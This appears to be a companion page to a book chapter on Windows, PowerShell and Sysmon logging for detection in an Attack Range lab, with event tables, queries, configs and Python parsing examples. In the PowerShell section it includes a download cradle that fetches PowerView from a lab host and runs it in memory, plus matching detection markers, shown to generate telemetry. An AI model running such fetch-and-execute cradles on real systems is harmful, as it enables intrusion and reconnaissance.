Introduction
This chapter explores the key log sources present in the Attack Range that enterprise Active Directory environments can make use of. It includes details of Windows event logs, PowerShell logs and Sysmon.
Chapter Content
This section provides reproductions of the key figures and code snippets seen in this chapter.
Windows Event Logs
Microsoft offers its own list of key event IDs to monitor. These can be seen below:
Sourced from: https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l–events-to-monitor
Key Event IDs
ID | Event Summary | Potential application
---|---|---
4624 | An account was successfully logged on. | Identification of anomalous account activity. Large-scale reconnaissance of neighboring hosts.
4625 | An account failed to log on. | Identification of anomalous account activity, brute force attempts, or password spraying.
4728 | A member was added to a security-enabled global group. | Privilege escalation via group membership changes. For example, additions to the Domain Admins group.
4732 | A member was added to a security-enabled local group. | Privilege escalation or increased access on a specific host. For example, addition to the local Administrators group.
4733 | A member was removed from a security-enabled local group. | Unauthorized changes to local privileged groups.
4768 | A Kerberos authentication ticket (TGT) was requested. | Anomalous authentication attempts via Kerberos. Pass-the-Ticket activity.
4769 | A Kerberos service ticket was requested. | Anomalous or large-scale requests for Kerberos service tickets (kerberoasting).
4741 | A computer account was created. | Precursor to Kerberos attacks such as Resource-based Constrained Delegation (RBCD).
4688 | A new process has been created. | Execution of suspicious commands. Use of living-off-the-land binaries and scripts (LOLBAS).
4698 | A scheduled task was created. | Installation of persistence.
7045 | A new service was installed in the system. | Persistence installation. Privilege escalation.
5145 | A network share object was checked to see whether client can be granted desired access. | Anomalous file share access. File share reconnaissance.
4662 | An operation was performed on an object. | DCSync attacks. Certificate modification (ESC4).
5136 | A directory service object was modified. | User modifications for targeted kerberoasting. Constrained delegation.
Viewing Logs in Event Viewer
A query to filter Windows Event Logs for logon events on the ar-win-dc domain controller in the Attack Range environment.
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(Computer='ar-win-dc.attackrange.local') and (EventID=4624)]]
</Select>
</Query>
</QueryList>
Another query, similar to the above, that looks for events from the Administrator user with a LogonType of 2 (an interactive local logon).
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[EventID=4624] and
EventData[Data[@Name='TargetUserName']='Administrator'] and
EventData[Data[@Name='LogonType']='2']]
</Select>
</Query>
</QueryList>
An example of the XML event log data produced from the above query.
<Event xmlns="http://schemas.microsoft.com/win/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-a5ba-3e3b0328c30d}" />
<EventID>4624</EventID>
<Level>0</Level>
--snip--
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<EventRecordID>182608</EventRecordID>
<Correlation ActivityID="{28aa6104-6329-0004-4561-aa282963da01}" />
<Execution ProcessID="656" ThreadID="5012" />
<Channel>Security</Channel>
<Computer>ar-win-dc.attackrange.local</Computer>
<Security />
</System>
<EventData>
<Data Name="TargetUserSid">S-1-5-21-3003545274-3581856904-3772676767-500</Data>
<Data Name="TargetUserName">Administrator</Data>
<Data Name="TargetDomainName">ATTACKRANGE</Data>
<Data Name="TargetLogonId">0x96c541</Data>
<Data Name="LogonType">2</Data>
<Data Name="LogonProcessName">seclogo</Data>
<Data Name="AuthenticationPackageName">Negotiate</Data>
<Data Name="WorkstationName">AR-WIN-DC</Data>
<Data Name="LogonGuid">{9a9ab8a0-2038-26c7-ce46-2604db784955}</Data>
<Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
<Data Name="ImpersonationLevel">%%1833</Data>
--snip--
</EventData>
</Event>
The wevtutil command can be used to perform the same queries outside of Event Viewer.
wevtutil qe Security "/q:*[System[EventID=4624] and EventData[Data[@Name='TargetUserName']='Administrator'] and EventData[Data[@Name='LogonType']='2']]"
PowerShell Logging
Script Blocks
Commands to install PowerSploit and host it on the Kali host in the Attack Range environment.
sudo apt update
sudo apt install powersploit
cd /usr/share/windows-resources/powersploit
python3 -m http.server 1337
A PowerShell download cradle that can fetch and load the PowerView script into memory on a Windows host.
Invoke-Expression (New-Object Net.Webclient).DownloadString("http://10.0.1.30:1337/Recon/PowerView.ps1")
The first of many associated PowerShell Script Block log entries (event ID 4104) for the above download cradle:
<Event xmlns="http://schemas.microsoft.com/win/events/event">
<System>
<Provider Name="Microsoft-Windows-PowerShell" Guid="{a0c1853b-5c40-4b15-8766-3cf1c58f985a}" />
<EventID>4104</EventID>
<Level>5</Level>
--snip--
<Execution ProcessID="5192" ThreadID="5164" />
<Channel>Microsoft-Windows-PowerShell/Operational</Channel>
<Computer>ar-win-2.attackrange.local</Computer>
<Security UserID="S-1-5-21-1234998748-2444849041-1163457548-500" />
</System>
<EventData>
<Data Name="MessageNumber">1</Data>
<Data Name="MessageTotal">1</Data>
<Data Name="ScriptBlockText">Invoke-Expression (New-Object Net.Webclient).DownloadString("http://10.0.1.30:1337/Recon/PowerView.ps1")</Data>
<Data Name="ScriptBlockId">3d296d00-b3bf-426c-9f87-9215896c146e</Data>
<Data Name="Path" />
</EventData>
</Event>
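Processing these events outside Event Viewer, as an added example that is not code from the book or from the Attack Range project: the Python below parses event XML in the layout shown above, applies the same EventID/TargetUserName/LogonType predicate as the earlier Security XPath query, and reassembles script blocks that PowerShell splits across several 4104 entries (MessageNumber/MessageTotal). The sample events are constructed inline; the split cradle reuses the ScriptBlockId of the entry above to show that a marker such as DownloadString can straddle two fragments and be missed by a per-entry substring search.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/events/event"}
CRADLE_MARKERS = ("DownloadString", "Invoke-Expression")

def parse_event(xml_text):
    """Flatten one event into a dict: EventID, Computer and every EventData/Data value."""
    root = ET.fromstring(xml_text)
    system = root.find("e:System", NS)
    fields = {"EventID": system.findtext("e:EventID", namespaces=NS),
              "Computer": system.findtext("e:Computer", namespaces=NS)}
    for data in root.iterfind("e:EventData/e:Data", NS):
        fields[data.get("Name")] = data.text or ""   # <Data Name="Path" /> becomes ""
    return fields

def matches(fields, event_id, **conditions):
    """The predicate of the Security XPath query above: EventID plus EventData equality."""
    return fields.get("EventID") == str(event_id) and all(
        fields.get(name) == value for name, value in conditions.items())

def reassemble_script_blocks(events):
    """Join fragmented 4104 entries per ScriptBlockId; only complete blocks are returned."""
    parts, totals = defaultdict(dict), {}
    for f in events:
        if f["EventID"] == "4104":
            parts[f["ScriptBlockId"]][int(f["MessageNumber"])] = f["ScriptBlockText"]
            totals[f["ScriptBlockId"]] = int(f["MessageTotal"])
    return {sbid: "".join(chunks[i] for i in sorted(chunks))
            for sbid, chunks in parts.items() if len(chunks) == totals[sbid]}

def cradle_markers(script_text):
    """Download-cradle markers present in a (reassembled) script block."""
    return [m for m in CRADLE_MARKERS if m in script_text]

def make_event(event_id, computer, **data):
    """Constructed sample event in the page's XML layout (test data, not a captured log)."""
    rows = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>{event_id}</EventID>'
            f'<Computer>{computer}</Computer></System><EventData>{rows}</EventData></Event>')

SB_ID = "3d296d00-b3bf-426c-9f87-9215896c146e"   # ScriptBlockId of the entry above
SAMPLE_EVENTS = [parse_event(e) for e in (
    make_event(4624, "ar-win-dc.attackrange.local", TargetUserName="Administrator", LogonType="2"),
    make_event(4624, "ar-win-dc.attackrange.local", TargetUserName="svc_backup", LogonType="3"),
    # The cradle split over two entries: neither fragment alone contains "DownloadString".
    make_event(4104, "ar-win-2.attackrange.local", MessageNumber="1", MessageTotal="2", ScriptBlockId=SB_ID,
               ScriptBlockText="Invoke-Expression (New-Object Net.Webclient).Download"),
    make_event(4104, "ar-win-2.attackrange.local", MessageNumber="2", MessageTotal="2", ScriptBlockId=SB_ID,
               ScriptBlockText='String("http://10.0.1.30:1337/Recon/PowerView.ps1")'),
)]
```

Real input would come from wevtutil qe ... /f:xml or a forwarded event channel; the parser is the same.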
Transcription
The reg command to enable PowerShell transcription.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" /v EnableTranscripting /t REG_DWORD /d 1 /f
An example of a PowerShell transcription log that shows a user fetching the current process ID.
**********************
Windows PowerShell transcript start
--snip--
Username: AR-WIN-2\Administrator
RunAs User: AR-WIN-2\Administrator
Configuration Name:
Machine: AR-WIN-2 (Microsoft Windows NT 10.0.17763.0)
Host Application: powershell
Process ID: 648
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17763.5202
**********************
**********************
**********************
PS C:\Users\Administrator>[System.Diagnostics.Process]::GetCurrentProcess().Id
648
Sysmon
The list of events produced by Sysmon at the time of writing can be seen below.
Sourced from: https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon#events
Sysmon Event IDs
ID | Event Name | Description
---|---|---
1 | Process creation | Records the creation of a new process, capturing details like the process ID, executable, and command line arguments. Also includes a process GUID that’s unique across a domain, aiding log correlation.
2 | A process changed a file creation time | Captures changes to the creation timestamp of a file. Commonly performed by attackers to *timestomp* a new malicious file so it blends in with existing files.
3 | Network connection | Logs details of TCP and UDP network connections, including source and destination IP addresses and ports, as well as the originating process ID and GUID.
4 | Sysmon service state changed | Logs changes in the state of the Sysmon service, such as when it is started or stopped.
5 | Process terminated | Records the termination of a process, providing information including its ID and GUID.
6 | Driver loaded | Captures information about loaded kernel drivers, including hashes and signature information.
7 | Image loaded | Logs when a module or image is loaded into a process. This includes where the image was loaded from, into which process, and details of hashes and signature information.
8 | CreateRemoteThread | Monitors a process’s creation of remote threads in other processes. This includes details of the source and destination processes, as well as information on the memory address, module and function being run.
9 | RawAccessRead | Captures attempts to directly read disk sectors using the \\.\ device notation rather than the file system.
10 | ProcessAccess | Logs when a process attempts to access another process via the opening of a handle. This includes details of the source and destination processes.
11 | FileCreate | Records the creation and overwriting of files, including details like file name, size, and creation timestamp.
12 | RegistryEvent (Object create and delete) | Captures the creation and deletion of registry keys and values.
13 | RegistryEvent (Value Set) | Captures when Registry values are modified, including the value that was set when it is of type DWORD or QWORD.
14 | RegistryEvent (Key and Value Rename) | Captures when an existing Registry key or value is renamed.
15 | FileCreateStreamHash | Monitors the creation of file streams and calculates their hash values.
16 | ServiceConfigurationChange | Logs changes to the Sysmon configuration, such as rule additions or modifications.
17 | PipeEvent (Pipe Created) | Captures the creation of named pipes, including details like the pipe name and process information.
18 | PipeEvent (Pipe Connected) | Captures when a named pipe connection occurs, providing details about the connecting process.
19 | WmiEvent (WmiEventFilter activity detected) | Logs events related to Windows Management Instrumentation (WMI) event filter registration, including the namespace, filter name and expression.
20 | WmiEvent (WmiEventConsumer activity detected) | Captures the registration of WMI consumers.
21 | WmiEvent (WmiEventConsumerToFilter activity detected) | Logs when a consumer binds to a filter, including details of consumer name and filter path.
22 | DNSEvent (DNS Query) | Captures when a process makes a DNS query, including the originating process and the hostname to be resolved.
23 | FileDelete (File Delete archived) | Captures the deletion of a file, and also saves the original file to the configured archive directory.
24 | ClipboardChange (New content in the clipboard) | Logs changes to the clipboard contents.
25 | ProcessTampering (Process image change) | Logs activity relating to evasion techniques such as *process hollowing* and *herpaderping*.
26 | FileDeleteDetected (File Delete logged) | Logs the deletion of a file, without the archiving functionality detailed in Event ID 23.
27 | FileBlockExecutable | Captures when Sysmon blocks the writing of an executable based on the conditions detailed in its configuration.
28 | FileBlockShredding | Generates events when Sysmon blocks file shredding.
29 | FileExecutableDetected | Logs the creation of a new executable file.
255 | Error | Logs when Sysmon encounters an error, potentially due to heavy load, failure to complete tasks, or encountering a bug.
Windows
A snippet of the Sysmon schema, which can be output with the -s flag.
<manifest schemaversion="x.xx" binaryversion="xx">
<configuration>
--snip--
<filters default="is">is,is not,contains,contains any,is any,contains all,excludes,excludes any,excludes all,begin with,not begin with,end with,not end with,less than,more than,image</filters>
</configuration>
<events>
<event name="SYSMONEVENT_DRIVER_LOAD" value="6" level="Informational" template="Driver loaded" rulename="DriverLoad" version="4">
<data name="RuleName" inType="win:UnicodeString" outType="xs:string" />
<data name="UtcTime" inType="win:UnicodeString" outType="xs:string" />
<data name="ImageLoaded" inType="win:UnicodeString" outType="xs:string" />
<data name="Hashes" inType="win:UnicodeString" outType="xs:string" />
<data name="Signed" inType="win:UnicodeString" outType="xs:string" />
<data name="Signature" inType="win:UnicodeString" outType="xs:string" />
<data name="SignatureStatus" inType="win:UnicodeString" outType="xs:string" />
</event>
--snip--
</events>
</manifest>
A Sysmon configuration that monitors for driver load events where the hash matches an entry from LOLDrivers or the driver belongs to a tool of interest, while excluding Intel-signed drivers.
<Sysmon schemaversion="x.xx">
<HashAlgorithms>*</HashAlgorithms>
<EventFiltering>
<RuleGroup name="Vulnerable or Malicious Driver Load" groupRelation="or">
<DriverLoad onmatch="include">
<Hashes name="LOLDriver Match" condition="contains">SHA256=56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c</Hashes>
<Hashes name="LOLDriver Match" condition="contains">SHA256=06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4</Hashes>
</DriverLoad>
</RuleGroup>
<RuleGroup name="Exclude Intel Drivers" groupRelation="or">
<DriverLoad onmatch="exclude">
<Signature condition="begin with">Intel </Signature>
</DriverLoad>
</RuleGroup>
<RuleGroup name="Tools of interest" groupRelation="or">
<DriverLoad onmatch="include">
<ImageLoaded name="Suspicious Tool Driver Load: System Informer" condition="contains">systeminformer.sys</ImageLoaded>
</DriverLoad>
</RuleGroup>
</EventFiltering>
</Sysmon>
The command to load a Sysmon config using the Sysmon binary.
Sysmon.exe -c "C:\Program Files\ansible\drivers-sysmon.xml"
Loading configuration file with schema version x.xx
Configuration file validated.
Configuration updated.
An example of the kernel driver load event produced with the above Sysmon configuration.
<Event xmlns="http://schemas.microsoft.com/win/events/event">
<System>
<Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385f-c22a-43e0-bf4c-06f5698ffbd9}" />
<EventID>6</EventID>
<Level>4</Level>
--snip--
<EventRecordID>3673</EventRecordID>
<Execution ProcessID="2792" ThreadID="3420" />
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>ar-win-dc</Computer>
<Security UserID="S-1-5-18" />
</System>
<EventData>
<Data Name="RuleName">Suspicious Tool Driver Load: System Informer</Data>
<Data Name="ImageLoaded">C:\Program Files\SystemInformer\SystemInformer.sys</Data>
--snip--
<Data Name="Hashes">SHA1=DB08DBE68A6C9BB29550E33CE95CE54CAF83E925,MD5=10BFCFC0215DAE77FB84BE8B2E63110E,SHA256=96A37B18EDE4B5BC616822C023B1B8CD85B3A76B205229701E21D75EA101B57C,IMPHASH=D6A8D3591C46C44511F288817529A6B4</Data>
<Data Name="Signed">true</Data>
<Data Name="Signature">Microsoft Windows Hardware Compatibility Publisher</Data>
<Data Name="SignatureStatus">Valid</Data>
</EventData>
</Event>
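To see how Sysmon would evaluate that configuration, an added example (not Sysmon's code, and a simplified model of its rule engine): the Python below applies the DriverLoad include and exclude rules above to the EventData fields of the System Informer event and to constructed variants, with exclude rules taking precedence as they do in Sysmon. The LOLDrivers hashes are the two from the configuration; the other driver paths, signer names and hashes are constructed placeholders.

```python
# Modelled on the DriverLoad rules of the configuration above (added example, not Sysmon code).
LOLDRIVER_SHA256 = {
    "56066ed07bad3b5c1474e8fae5ee2543d17d7977369b34450bd0775517e3b25c",
    "06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4",
}
# (rule name, event field, condition, value) in the order the configuration lists them.
INCLUDE_RULES = [("LOLDriver Match", "Hashes", "contains", "SHA256=" + h)
                 for h in sorted(LOLDRIVER_SHA256)]
INCLUDE_RULES.append(("Suspicious Tool Driver Load: System Informer",
                      "ImageLoaded", "contains", "systeminformer.sys"))
EXCLUDE_RULES = [("Exclude Intel Drivers", "Signature", "begin with", "Intel ")]

def parse_hashes(hashes_field):
    """Split Sysmon's 'SHA1=..,MD5=..,SHA256=..,IMPHASH=..' field into {algorithm: hex}."""
    return dict(part.split("=", 1) for part in hashes_field.split(","))

def condition_matches(field_value, condition, value):
    """Sysmon string conditions are case-insensitive (events carry upper-case hex hashes)."""
    fv, v = field_value.lower(), value.lower()
    if condition == "contains":
        return v in fv
    if condition == "begin with":
        return fv.startswith(v)
    if condition == "is":
        return fv == v
    raise ValueError(f"condition not modelled here: {condition}")

def evaluate_driver_load(event):
    """Name of the include rule that would log this event, or None. Exclude rules win."""
    for _, field, cond, val in EXCLUDE_RULES:
        if condition_matches(event.get(field, ""), cond, val):
            return None
    for name, field, cond, val in INCLUDE_RULES:
        if condition_matches(event.get(field, ""), cond, val):
            return name
    return None

def is_known_loldriver(event):
    """SIEM-side exact lookup of the SHA256, independent of Sysmon's substring match."""
    return parse_hashes(event["Hashes"]).get("SHA256", "").lower() in LOLDRIVER_SHA256

# EventData fields of the System Informer event shown above, plus constructed variants.
SYSTEM_INFORMER = {
    "ImageLoaded": r"C:\Program Files\SystemInformer\SystemInformer.sys",
    "Hashes": "SHA1=DB08DBE68A6C9BB29550E33CE95CE54CAF83E925,MD5=10BFCFC0215DAE77FB84BE8B2E63110E,"
              "SHA256=96A37B18EDE4B5BC616822C023B1B8CD85B3A76B205229701E21D75EA101B57C,IMPHASH=D6A8D3591C46C44511F288817529A6B4",
    "Signature": "Microsoft Windows Hardware Compatibility Publisher",
}
LOLDRIVER_EVENT = {"ImageLoaded": r"C:\Windows\Temp\drv.sys", "Signature": "Example Vendor Ltd",   # constructed
                   "Hashes": "SHA1=<constructed>,MD5=<constructed>,SHA256=" + sorted(LOLDRIVER_SHA256)[0].upper()}
INTEL_LOLDRIVER = dict(LOLDRIVER_EVENT, Signature="Intel Corporation")  # the exclude rule hides this one
BENIGN_DRIVER = {"ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
                 "Hashes": "SHA256=<constructed>", "Signature": "Microsoft Windows"}
```

A driver whose hash is on the LOLDrivers list is still dropped when the Intel exclusion matches, so keep exclusions as narrow as the signer name allows and consider an exact hash lookup downstream.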
Resources
The following resources expand on topics covered in this chapter.
Windows Event Logs
Details from Microsoft on the standard event logs available and how they're configured in the Windows Registry
"Eventlog Key," Microsoft, accessed April 28, 2024
An invaluable reference for Windows event log and Sysmon event data
"Windows Security Log Encyclopedia," Ultimate Windows Security, accessed March 30, 2024
A guide to Windows event log forwarding (WEF)
"The Windows Event Forwarding Survival Guide," Chris Long, July 24, 2017
Utilizing native logging provided by audit policy and System Access Control Lists (SACLs) to detect various post-exploitation behaviours
"Detecting Windows Endpoint Compromise with SACLs," Dane Stuckey, July 16, 2018
More details on using XPath queries to filter and query Windows event logs
"Event Queries and Event XML," Microsoft, July 28, 2009
Guidance from Microsoft on default event log audit policy configuration, as well as recommended and elevated logging policy configurations
"Audit Policy Recommendations," Microsoft, August 3, 2023
Microsoft's guidance on effective Windows event logging for defending Active Directory deployments
"Monitoring Active Directory for Signs of Compromise," Microsoft, February 15, 2023
Microsoft's extensive list of events to monitor
"Appendix L: Events to Monitor," Microsoft, June 8, 2022
PowerShell Logging
Notice of the deprecation of PowerShell version 2
"Windows PowerShell 2.0 Deprecation," Microsoft, August 24, 2017
An example Sigma rule for the detection of PowerShell downgrade attacks
"proc_creation_win_powershell_downgrade_attack.yml," Harish Segar, January 4, 2023
The suspicious cmdlets and script elements that trigger production of script block logging events
"CompiledScriptBlock.cs," GitHub, accessed April 28, 2024
Other examples of PowerShell download cradles from Will Schroeder
"DownloadCradles.ps1," Will Schroeder, accessed March 30, 2014
More detail on PowerShell logging features and configuration options
"Greater Visibility Through PowerShell Logging," Matthew Dunwoody, February 11, 2016
An overview of AMSI and its architecture, as well as demonstrations of its effect on file-less malware
"How the Antimalware Scan Interface (AMSI) helps you defend against malware," Microsoft, August 23, 2019
A thoroughly detailed walkthrough of AMSI and the telemetry it can produce
"Better know a data source: Antimalware Scan Interface," Jimmy Astle, Matt Graeber, July 19, 2022
Sysmon
A comparison between the telemetry and detection engineering aspects of Sysmon and the Microsoft Defender for Endpoint EDR solution
"Sysmon vs Microsoft Defender for Endpoint, MDE Internals 0x01," Olaf Hartong, October 15, 2021
@SwiftOnSecurity’s Sysmon configuration, designed as a performant and highly-tuned option. Used in the Attack Range lab environment by default
"sysmon-config," @SwiftOnSecurity, accessed May 24, 2024
Olaf Hartong’s sysmon-modular repository provides an organized collection of Sysmon configuration snippets organized by event type, as well as a range of generated configurations that vary in verbosity and application
"sysmon-modular," Olaf Hartong, accessed May 24, 2024
A fork of @SwiftOnSecurity’s Sysmon configuration maintained by Florian Roth, Tobias Michalski, Christian Burkard and Nasreddine Bencherchali. This configuration extends the original with additional entries for known offensive tool indicators and exploits
"sysmon-config," Florian Roth, Tobias Michalski, Christian Burkard and Nasreddine Bencherchali, accessed May 24, 2024
An offensive perspective on operating on hosts monitored with Sysmon
"Operating Offensively Against Sysmon," Carlos Perez, October 8, 2018
Extracting Sysmon configuration from the Windows Registry
"SysmonRuleParser.ps1," Matt Graeber, accessed March 30, 2024
The lab environment Linux Sysmon configuration
"SysMonLinux-CatchAll.xml," accessed May 23, 2024